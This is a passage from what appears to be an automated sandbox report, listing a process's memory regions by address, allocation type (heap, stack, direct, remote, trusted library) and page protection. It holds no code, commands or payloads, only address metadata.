stack
|
page read and write
|
||
|
3439000
|
trusted library allocation
|
page read and write
|
||
|
8D90000
|
trusted library allocation
|
page execute and read and write
|
||
|
21ECF000
|
stack
|
page read and write
|
||
|
7DA0000
|
trusted library allocation
|
page read and write
|
||
|
8E20000
|
direct allocation
|
page read and write
|
||
|
25056900000
|
heap
|
page read and write
|
||
|
222B4000
|
direct allocation
|
page read and write
|
||
|
21E30000
|
heap
|
page read and write
|
||
|
7FF848DFD000
|
trusted library allocation
|
page execute and read and write
|
||
|
7D20000
|
trusted library allocation
|
page read and write
|
||
|
222C0000
|
direct allocation
|
page read and write
|
||
|
222C0000
|
direct allocation
|
page read and write
|
||
|
11E927E0000
|
heap
|
page read and write
|
||
|
7A50000
|
trusted library allocation
|
page execute and read and write
|
||
|
222C0000
|
direct allocation
|
page read and write
|
||
|
6950000
|
heap
|
page read and write
|
||
|
222D0000
|
direct allocation
|
page read and write
|
||
|
7BFC000
|
stack
|
page read and write
|
||
|
441A000
|
remote allocation
|
page execute and read and write
|
||
|
250687C0000
|
trusted library allocation
|
page read and write
|
||
|
25056851000
|
heap
|
page read and write
|
||
|
F6E8C7C000
|
stack
|
page read and write
|
||
|
222BC000
|
direct allocation
|
page read and write
|
||
|
F6E85FE000
|
stack
|
page read and write
|
||
|
2505A59A000
|
trusted library allocation
|
page read and write
|
||
|
8920000
|
trusted library allocation
|
page read and write
|
||
|
35AC000
|
heap
|
page read and write
|
||
|
4FC5000
|
heap
|
page execute and read and write
|
||
|
2505A561000
|
trusted library allocation
|
page read and write
|
||
|
222B8000
|
direct allocation
|
page read and write
|
||
|
373C000
|
heap
|
page read and write
|
||
|
2204E000
|
stack
|
page read and write
|
||
|
7FF848EAC000
|
trusted library allocation
|
page execute and read and write
|
||
|
25059A59000
|
trusted library allocation
|
page read and write
|
||
|
222DC000
|
direct allocation
|
page read and write
|
||
|
6B5F000
|
stack
|
page read and write
|
||
|
25070A10000
|
heap
|
page read and write
|
||
|
222C4000
|
direct allocation
|
page read and write
|
||
|
25068A9A000
|
trusted library allocation
|
page read and write
|
||
|
25070AD0000
|
heap
|
page read and write
|
||
|
69E0000
|
heap
|
page read and write
|
||
|
7FF848EB0000
|
trusted library allocation
|
page execute and read and write
|
||
|
25059059000
|
trusted library allocation
|
page read and write
|
||
|
7FF848E00000
|
trusted library allocation
|
page read and write
|
||
|
7FF849040000
|
trusted library allocation
|
page read and write
|
||
|
4E2C000
|
stack
|
page read and write
|
||
|
25070A07000
|
heap
|
page execute and read and write
|
||
|
33D0000
|
heap
|
page read and write
|
||
|
3423000
|
trusted library allocation
|
page execute and read and write
|
||
|
25058520000
|
trusted library allocation
|
page read and write
|
||
|
890A000
|
trusted library allocation
|
page read and write
|
||
|
25058FE8000
|
trusted library allocation
|
page read and write
|
||
|
250584A0000
|
heap
|
page readonly
|
||
|
222F0000
|
direct allocation
|
page read and write
|
||
|
33F0000
|
heap
|
page read and write
|
||
|
7F940000
|
trusted library allocation
|
page execute and read and write
|
||
|
353E000
|
heap
|
page read and write
|
||
|
7A20000
|
trusted library allocation
|
page read and write
|
||
|
F6E818E000
|
stack
|
page read and write
|
||
|
222BC000
|
direct allocation
|
page read and write
|
||
|
69E0000
|
heap
|
page read and write
|
||
|
8B6C000
|
stack
|
page read and write
|
||
|
7FF8490C0000
|
trusted library allocation
|
page read and write
|
||
|
21FCC000
|
stack
|
page read and write
|
||
|
3700000
|
trusted library allocation
|
page read and write
|
||
|
8970000
|
trusted library allocation
|
page read and write
|
||
|
222C4000
|
direct allocation
|
page read and write
|
||
|
222BC000
|
direct allocation
|
page read and write
|
||
|
8E90000
|
direct allocation
|
page read and write
|
||
|
2505883E000
|
trusted library allocation
|
page read and write
|
||
|
2225B000
|
stack
|
page read and write
|
||
|
222C4000
|
direct allocation
|
page read and write
|
||
|
222BC000
|
direct allocation
|
page read and write
|
||
|
4E6E000
|
stack
|
page read and write
|
||
|
6992000
|
heap
|
page read and write
|
||
|
221BE000
|
stack
|
page read and write
|
||
|
3350000
|
heap
|
page read and write
|
||
|
8E50000
|
direct allocation
|
page read and write
|
||
|
21F8D000
|
stack
|
page read and write
|
||
|
8B2E000
|
stack
|
page read and write
|
||
|
222B0000
|
direct allocation
|
page read and write
|
||
|
7FF848FAA000
|
trusted library allocation
|
page read and write
|
||
|
250585B0000
|
heap
|
page read and write
|
||
|
2505679D000
|
heap
|
page read and write
|
||
|
794C000
|
heap
|
page read and write
|
||
|
25058125000
|
heap
|
page read and write
|
||
|
6940000
|
heap
|
page readonly
|
||
|
8BA9000
|
heap
|
page read and write
|
||
|
7D40000
|
trusted library allocation
|
page read and write
|
||
|
25058760000
|
heap
|
page execute and read and write
|
||
|
75BE000
|
stack
|
page read and write
|
||
|
7FF849110000
|
trusted library allocation
|
page read and write
|
||
|
11E92740000
|
heap
|
page read and write
|
||
|
25056670000
|
heap
|
page read and write
|
||
|
8910000
|
trusted library allocation
|
page read and write
|
||
|
222B0000
|
direct allocation
|
page read and write
|
||
|
2F8D000
|
stack
|
page read and write
|
||
|
250587A0000
|
heap
|
page execute and read and write
|
||
|
4E1A000
|
remote allocation
|
page execute and read and write
|
||
|
7DB0000
|
trusted library allocation
|
page read and write
|
||
|
25056845000
|
heap
|
page read and write
|
||
|
2505A5F4000
|
trusted library allocation
|
page read and write
|
||
|
7FF849090000
|
trusted library allocation
|
page read and write
|
||
|
87A0000
|
heap
|
page read and write
|
||
|
25058CA7000
|
trusted library allocation
|
page read and write
|
||
|
222B0000
|
direct allocation
|
page read and write
|
||
|
F6E8B7F000
|
stack
|
page read and write
|
||
|
222BC000
|
direct allocation
|
page read and write
|
||
|
21F0E000
|
stack
|
page read and write
|
||
|
7960000
|
heap
|
page read and write
|
||
|
21E8E000
|
stack
|
page read and write
|
||
|
36E0000
|
trusted library allocation
|
page read and write
|
||
|
357E000
|
stack
|
page read and write
|
||
|
6958000
|
heap
|
page read and write
|
||
|
3473000
|
heap
|
page read and write
|
||
|
2FF0000
|
heap
|
page read and write
|
||
|
784E000
|
stack
|
page read and write
|
||
|
25056863000
|
heap
|
page read and write
|
||
|
250585C0000
|
heap
|
page read and write
|
||
|
222B8000
|
direct allocation
|
page read and write
|
||
|
7FF849120000
|
trusted library allocation
|
page read and write
|
||
|
69CD000
|
heap
|
page read and write
|
||
|
2505A605000
|
trusted library allocation
|
page read and write
|
||
|
25070A2C000
|
heap
|
page read and write
|
||
|
25058110000
|
trusted library allocation
|
page read and write
|
||
|
34BD000
|
heap
|
page read and write
|
||
|
25058C28000
|
trusted library allocation
|
page read and write
|
||
|
152E4FF000
|
stack
|
page read and write
|
||
|
7FF848F90000
|
trusted library allocation
|
page read and write
|
||
|
222A8000
|
direct allocation
|
page read and write
|
||
|
8E00000
|
direct allocation
|
page read and write
|
||
|
4DDB000
|
trusted library allocation
|
page read and write
|
||
|
F6E86FE000
|
stack
|
page read and write
|
||
|
7FF849060000
|
trusted library allocation
|
page read and write
|
||
|
757A000
|
stack
|
page read and write
|
||
|
250708D1000
|
heap
|
page read and write
|
||
|
32FE000
|
stack
|
page read and write
|
||
|
6B60000
|
direct allocation
|
page read and write
|
||
|
7FF848FB0000
|
trusted library allocation
|
page execute and read and write
|
||
|
222B4000
|
direct allocation
|
page read and write
|
||
|
6BA0000
|
direct allocation
|
page read and write
|
||
|
69BD000
|
heap
|
page read and write
|
||
|
8BA4000
|
heap
|
page read and write
|
||
|
222BC000
|
direct allocation
|
page read and write
|
||
|
763E000
|
stack
|
page read and write
|
||
|
7FF848F10000
|
trusted library allocation
|
page execute and read and write
|
||
|
7FF8490D0000
|
trusted library allocation
|
page read and write
|
||
|
25056790000
|
heap
|
page read and write
|
||
|
6B90000
|
direct allocation
|
page read and write
|
||
|
222C4000
|
direct allocation
|
page read and write
|
||
|
4EEE000
|
stack
|
page read and write
|
||
|
7FF849080000
|
trusted library allocation
|
page read and write
|
||
|
22180000
|
remote allocation
|
page read and write
|
||
|
8980000
|
heap
|
page read and write
|
||
|
344C000
|
heap
|
page read and write
|
||
|
22570000
|
heap
|
page read and write
|
||
|
68EE000
|
stack
|
page read and write
|
||
|
25058120000
|
heap
|
page read and write
|
||
|
69BA000
|
heap
|
page read and write
|
||
|
2505A5B2000
|
trusted library allocation
|
page read and write
|
||
|
222B8000
|
direct allocation
|
page read and write
|
||
|
6B70000
|
direct allocation
|
page read and write
|
||
|
222E8000
|
direct allocation
|
page read and write
|
||
|
8E80000
|
direct allocation
|
page read and write
|
||
|
222AC000
|
direct allocation
|
page read and write
|
||
|
2505A5F0000
|
trusted library allocation
|
page read and write
|
||
|
21AD0000
|
direct allocation
|
page read and write
|
||
|
7FF848FF0000
|
trusted library allocation
|
page read and write
|
||
|
222C0000
|
direct allocation
|
page read and write
|
||
|
222C0000
|
direct allocation
|
page read and write
|
||
|
22560000
|
heap
|
page read and write
|
||
|
347F000
|
heap
|
page read and write
|
||
|
F6E88F6000
|
stack
|
page read and write
|
||
|
25070A38000
|
heap
|
page read and write
|
||
|
8BE7000
|
heap
|
page read and write
|
||
|
11E92647000
|
heap
|
page read and write
|
||
|
F6E964E000
|
stack
|
page read and write
|
||
|
25058CAB000
|
trusted library allocation
|
page read and write
|
||
|
4E70000
|
trusted library allocation
|
page execute and read and write
|
||
|
61BD000
|
trusted library allocation
|
page read and write
|
||
|
5645000
|
trusted library allocation
|
page read and write
|
||
|
33F0000
|
trusted library section
|
page read and write
|
||
|
330F000
|
stack
|
page read and write
|
||
|
2505A7E8000
|
trusted library allocation
|
page read and write
|
||
|
8900000
|
trusted library allocation
|
page read and write
|
||
|
222BC000
|
direct allocation
|
page read and write
|
||
|
25056829000
|
heap
|
page read and write
|
||
|
87D0000
|
trusted library allocation
|
page read and write
|
||
|
2505A6FE000
|
trusted library allocation
|
page read and write
|
||
|
747B000
|
stack
|
page read and write
|
||
|
F6E8878000
|
stack
|
page read and write
|
||
|
222BC000
|
direct allocation
|
page read and write
|
||
|
4F2E000
|
stack
|
page read and write
|
||
|
B46A000
|
direct allocation
|
page execute and read and write
|
||
|
222FC000
|
direct allocation
|
page read and write
|
||
|
222BC000
|
direct allocation
|
page read and write
|
||
|
743D000
|
stack
|
page read and write
|
||
|
7FF848EA0000
|
trusted library allocation
|
page read and write
|
||
|
7680000
|
heap
|
page read and write
|
||
|
2505904D000
|
trusted library allocation
|
page read and write
|
||
|
F6E87FD000
|
stack
|
page read and write
|
||
|
2F39000
|
stack
|
page read and write
|
||
|
222BC000
|
direct allocation
|
page read and write
|
||
|
2211E000
|
stack
|
page read and write
|
||
|
68A5000
|
heap
|
page read and write
|
||
|
753E000
|
stack
|
page read and write
|
||
|
222C0000
|
direct allocation
|
page read and write
|
||
|
5031000
|
trusted library allocation
|
page read and write
|
||
|
3410000
|
trusted library allocation
|
page read and write
|
||
|
2505A071000
|
trusted library allocation
|
page read and write
|
||
|
25070A47000
|
heap
|
page read and write
|
||
|
8E10000
|
direct allocation
|
page read and write
|
||
|
8A65000
|
trusted library allocation
|
page read and write
|
||
|
7D10000
|
trusted library allocation
|
page read and write
|
||
|
A06A000
|
direct allocation
|
page execute and read and write
|
||
|
25070AE6000
|
heap
|
page read and write
|
||
|
F6E857D000
|
stack
|
page read and write
|
||
|
36D0000
|
trusted library allocation
|
page read and write
|
||
|
3710000
|
heap
|
page read and write
|
||
|
222C8000
|
direct allocation
|
page read and write
|
||
|
250568B0000
|
heap
|
page read and write
|
||
|
4FC0000
|
heap
|
page execute and read and write
|
||
|
2FFE000
|
stack
|
page read and write
|
||
|
222C4000
|
direct allocation
|
page read and write
|
||
|
6BB0000
|
direct allocation
|
page read and write
|
||
|
4F6E000
|
stack
|
page read and write
|
||
|
7480000
|
trusted library allocation
|
page read and write
|
||
|
69CC000
|
heap
|
page read and write
|
||
|
222C8000
|
direct allocation
|
page read and write
|
||
|
11E92760000
|
heap
|
page read and write
|
||
|
222CC000
|
direct allocation
|
page read and write
|
||
|
3420000
|
trusted library allocation
|
page read and write
|
||
|
7FF848DF2000
|
trusted library allocation
|
page read and write
|
||
|
500E000
|
stack
|
page read and write
|
||
|
36DA000
|
trusted library allocation
|
page execute and read and write
|
||
|
353E000
|
unkown
|
page read and write
|
||
|
7FF848EA6000
|
trusted library allocation
|
page read and write
|
||
|
25059037000
|
trusted library allocation
|
page read and write
|
||
|
250687D1000
|
trusted library allocation
|
page read and write
|
||
|
69E2000
|
heap
|
page read and write
|
||
|
F6E8BFE000
|
stack
|
page read and write
|
||
|
7FF849050000
|
trusted library allocation
|
page read and write
|
||
|
8BFE000
|
heap
|
page read and write
|
||
|
78CE000
|
stack
|
page read and write
|
||
|
222E4000
|
direct allocation
|
page read and write
|
||
|
7FF848DF0000
|
trusted library allocation
|
page read and write
|
||
|
F6E8106000
|
stack
|
page read and write
|
||
|
222BC000
|
direct allocation
|
page read and write
|
||
|
25058C54000
|
trusted library allocation
|
page read and write
|
||
|
4DD8000
|
trusted library allocation
|
page read and write
|
||
|
2EFC000
|
stack
|
page read and write
|
||
|
7FF849000000
|
trusted library allocation
|
page read and write
|
||
|
6A32000
|
heap
|
page read and write
|
||
|
2505688B000
|
heap
|
page read and write
|
||
|
688E000
|
stack
|
page read and write
|
||
|
11E92640000
|
heap
|
page read and write
|
||
|
790E000
|
stack
|
page read and write
|
||
|
222B0000
|
direct allocation
|
page read and write
|
||
|
33E0000
|
heap
|
page read and write
|
||
|
73AE000
|
stack
|
page read and write
|
||
|
222BC000
|
direct allocation
|
page read and write
|
||
|
222F8000
|
direct allocation
|
page read and write
|
||
|
692D000
|
stack
|
page read and write
|
||
|
3060000
|
heap
|
page read and write
|
||
|
7FF8490A0000
|
trusted library allocation
|
page read and write
|
||
|
222B8000
|
direct allocation
|
page read and write
|
||
|
69E2000
|
heap
|
page read and write
|
||
|
7FF848DF3000
|
trusted library allocation
|
page execute and read and write
|
||
|
25056843000
|
heap
|
page read and write
|
||
|
222A8000
|
direct allocation
|
page read and write
|
||
|
4E88000
|
heap
|
page read and write
|
||
|
6BE0000
|
direct allocation
|
page read and write
|
||
|
25070849000
|
heap
|
page read and write
|
||
|
69E0000
|
heap
|
page read and write
|
||
|
7BBE000
|
stack
|
page read and write
|
||
|
8E30000
|
direct allocation
|
page read and write
|
||
|
222A4000
|
direct allocation
|
page read and write
|
||
|
8BB9000
|
heap
|
page read and write
|
||
|
222BC000
|
direct allocation
|
page read and write
|
||
|
7D30000
|
trusted library allocation
|
page read and write
|
||
|
4DCE000
|
stack
|
page read and write
|
||
|
222B4000
|
direct allocation
|
page read and write
|
||
|
2FB0000
|
heap
|
page read and write
|
||
|
7E0B000
|
stack
|
page read and write
|
||
|
AA6A000
|
direct allocation
|
page execute and read and write
|
||
|
222BC000
|
direct allocation
|
page read and write
|
||
|
88B0000
|
trusted library allocation
|
page read and write
|
||
|
7DC0000
|
trusted library allocation
|
page read and write
|
||
|
222BC000
|
direct allocation
|
page read and write
|
||
|
222D4000
|
direct allocation
|
page read and write
|
||
|
222BC000
|
direct allocation
|
page read and write
|
||
|
222B8000
|
direct allocation
|
page read and write
|
||
|
6097000
|
trusted library allocation
|
page read and write
|
||
|
6840000
|
heap
|
page read and write
|
||
|
2505A57E000
|
trusted library allocation
|
page read and write
|
||
|
8BAD000
|
heap
|
page read and write
|
||
|
25056847000
|
heap
|
page read and write
|
||
|
699D000
|
heap
|
page read and write
|
||
|
6B80000
|
direct allocation
|
page read and write
|
||
|
222C0000
|
direct allocation
|
page read and write
|
||
|
7FF849030000
|
trusted library allocation
|
page read and write
|
||
|
8B70000
|
heap
|
page read and write
|
||
|
7FF849160000
|
trusted library allocation
|
page read and write
|
||
|
222BC000
|
direct allocation
|
page read and write
|
||
|
883D000
|
stack
|
page read and write
|
||
|
69E0000
|
heap
|
page read and write
|
||
|
3730000
|
heap
|
page read and write
|
||
|
222B4000
|
direct allocation
|
page read and write
|
||
|
11E92560000
|
heap
|
page read and write
|
||
|
7FF848DF4000
|
trusted library allocation
|
page read and write
|
||
|
25058FA6000
|
trusted library allocation
|
page read and write
|
||
|
4340000
|
remote allocation
|
page execute and read and write
|
||
|
5098000
|
trusted library allocation
|
page read and write
|
||
|
222BC000
|
direct allocation
|
page read and write
|
||
|
8B90000
|
heap
|
page read and write
|
||
|
69E2000
|
heap
|
page read and write
|
||
|
25068AA9000
|
trusted library allocation
|
page read and write
|
||
|
4E90000
|
trusted library allocation
|
page read and write
|
||
|
25056770000
|
heap
|
page read and write
|
||
|
7FF849020000
|
trusted library allocation
|
page read and write
|
||
|
25059022000
|
trusted library allocation
|
page read and write
|
||
|
250584E0000
|
trusted library allocation
|
page read and write
|
||
|
222BC000
|
direct allocation
|
page read and write
|
||
|
621A000
|
remote allocation
|
page execute and read and write
|
||
|
7970000
|
heap
|
page read and write
|
||
|
75FB000
|
stack
|
page read and write
|
||
|
F6E877E000
|
stack
|
page read and write
|
||
|
887E000
|
stack
|
page read and write
|
||
|
222BC000
|
direct allocation
|
page read and write
|
||
|
88E7000
|
trusted library allocation
|
page read and write
|
||
|
7D70000
|
trusted library allocation
|
page read and write
|
||
|
152E2FD000
|
stack
|
page read and write
|
||
|
8890000
|
trusted library allocation
|
page execute and read and write
|
||
|
222C0000
|
direct allocation
|
page read and write
|
||
|
8AAC000
|
stack
|
page read and write
|
||
|
8797000
|
stack
|
page read and write
|
||
|
36E5000
|
trusted library allocation
|
page execute and read and write
|
||
|
4E80000
|
heap
|
page read and write
|
||
|
7FF848FA1000
|
trusted library allocation
|
page read and write
|
||
|
F6E847E000
|
stack
|
page read and write
|
||
|
222BC000
|
direct allocation
|
page read and write
|
||
|
8E60000
|
direct allocation
|
page read and write
|
||
|
767D000
|
stack
|
page read and write
|
||
|
F6E89F7000
|
stack
|
page read and write
|
||
|
6A40000
|
heap
|
page read and write
|
||
|
25070893000
|
heap
|
page read and write
|
||
|
222A0000
|
direct allocation
|
page read and write
|
||
|
69CA000
|
heap
|
page read and write
|
||
|
518C000
|
trusted library allocation
|
page read and write
|
||
|
79CD000
|
heap
|
page read and write
|
||
|
250584B0000
|
trusted library allocation
|
page read and write
|
||
|
7D80000
|
trusted library allocation
|
page read and write
|
||
|
22290000
|
stack
|
page read and write
|
||
|
788E000
|
stack
|
page read and write
|
||
|
7FF849100000
|
trusted library allocation
|
page read and write
|
||
|
25058C3B000
|
trusted library allocation
|
page read and write
|
||
|
F6E974B000
|
stack
|
page read and write
|
||
|
7A30000
|
heap
|
page execute and read and write
|
||
|
79ED000
|
heap
|
page read and write
|
||
|
7FF8490F0000
|
trusted library allocation
|
page read and write
|
||
|
222C4000
|
direct allocation
|
page read and write
|
||
|
34C5000
|
heap
|
page read and write
|
||
|
F6E81CE000
|
stack
|
page read and write
|
||
|
6BD0000
|
direct allocation
|
page read and write
|
||
|
7FF848E0B000
|
trusted library allocation
|
page read and write
|
||
|
22300000
|
direct allocation
|
page read and write
|
||
|
3400000
|
trusted library section
|
page read and write
|
||
|
250568E0000
|
heap
|
page read and write
|
||
|
33D0000
|
heap
|
page read and write
|
||
|
8DF0000
|
direct allocation
|
page read and write
|
||
|
222C8000
|
direct allocation
|
page read and write
|
||
|
F6E97CB000
|
stack
|
page read and write
|
||
|
222C0000
|
direct allocation
|
page read and write
|
||
|
6C00000
|
direct allocation
|
page read and write
|
||
|
250587B1000
|
trusted library allocation
|
page read and write
|
||
|
2505A586000
|
trusted library allocation
|
page read and write
|
||
|
7910000
|
heap
|
page read and write
|
||
|
7DF44D810000
|
trusted library allocation
|
page execute and read and write
|
||
|
7FF848FC0000
|
trusted library allocation
|
page execute and read and write
|
||
|
222AC000
|
direct allocation
|
page read and write
|
||
|
25058C69000
|
trusted library allocation
|
page read and write
|
||
|
88A0000
|
trusted library allocation
|
page read and write
|
||
|
8D70000
|
trusted library allocation
|
page read and write
|
||
|
74F0000
|
direct allocation
|
page read and write
|
||
|
8EA0000
|
direct allocation
|
page read and write
|
||
|
220DD000
|
stack
|
page read and write
|
||
|
6BC0000
|
direct allocation
|
page read and write
|
||
|
339E000
|
stack
|
page read and write
|
||
|
7690000
|
heap
|
page read and write
|
||
|
3529000
|
heap
|
page read and write
|
||
|
222BC000
|
direct allocation
|
page read and write
|
||
|
2505A598000
|
trusted library allocation
|
page read and write
|
||
|
343E000
|
unkown
|
page read and write
|
||
|
25070847000
|
heap
|
page read and write
|
||
|
69B2000
|
heap
|
page read and write
|
||
|
222D8000
|
direct allocation
|
page read and write
|
||
|
7D50000
|
trusted library allocation
|
page read and write
|
||
|
7FF849150000
|
trusted library allocation
|
page read and write
|
||
|
87B0000
|
trusted library allocation
|
page execute and read and write
|
||
|
222B8000
|
direct allocation
|
page read and write
|
||
|
25058C43000
|
trusted library allocation
|
page read and write
|
||
|
222AC000
|
direct allocation
|
page read and write
|
||
|
222B4000
|
direct allocation
|
page read and write
|
||
|
11E927D4000
|
heap
|
page read and write
|
||
|
69CC000
|
heap
|
page read and write
|
||
|
25058E70000
|
trusted library allocation
|
page read and write
|
||
|
222E0000
|
direct allocation
|
page read and write
|
||
|
221FF000
|
stack
|
page read and write
|
||
|
3430000
|
trusted library allocation
|
page read and write
|
||
|
222BC000
|
direct allocation
|
page read and write
|
||
|
250708B0000
|
heap
|
page read and write
|
||
|
2505A573000
|
trusted library allocation
|
page read and write
|
||
|
7A40000
|
trusted library allocation
|
page read and write
|
||
|
25070AD8000
|
heap
|
page read and write
|
||
|
9590000
|
direct allocation
|
page execute and read and write
|
||
|
6059000
|
trusted library allocation
|
page read and write
|
||
|
8BB5000
|
heap
|
page read and write
|
||
|
222BC000
|
direct allocation
|
page read and write
|
||
|
3424000
|
trusted library allocation
|
page read and write
|
||
|
25070A94000
|
heap
|
page read and write
|
||
|
25056750000
|
heap
|
page read and write
|
||
|
222BC000
|
direct allocation
|
page read and write
|
||
|
581A000
|
remote allocation
|
page execute and read and write
|
||
|
3440000
|
heap
|
page read and write
|
||
|
7A28000
|
trusted library allocation
|
page read and write
|
||
|
222C0000
|
direct allocation
|
page read and write
|
There are 517 hidden memdumps, click here to show them.